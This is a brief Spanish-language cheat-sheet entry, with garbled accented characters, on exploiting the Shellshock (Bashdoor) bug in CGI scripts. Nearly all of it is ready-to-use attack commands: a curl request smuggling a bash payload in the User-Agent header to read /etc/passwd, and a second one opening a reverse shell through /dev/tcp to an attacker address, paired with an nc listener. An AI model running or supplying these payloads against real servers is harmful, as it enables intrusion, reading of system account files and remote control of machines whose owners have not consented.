Verificaci贸n de vulnerabilidad Shellshock / Bashdoor.
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<target>/cgi-bin/<vulnerable>
Reverse shell.
# M谩quina atacante nc -lvnp <listen-port> # M谩quina victima curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" http://<target>/cgi-bin/<vulnerable>
脷ltima actualizaci贸n hace 1 a帽o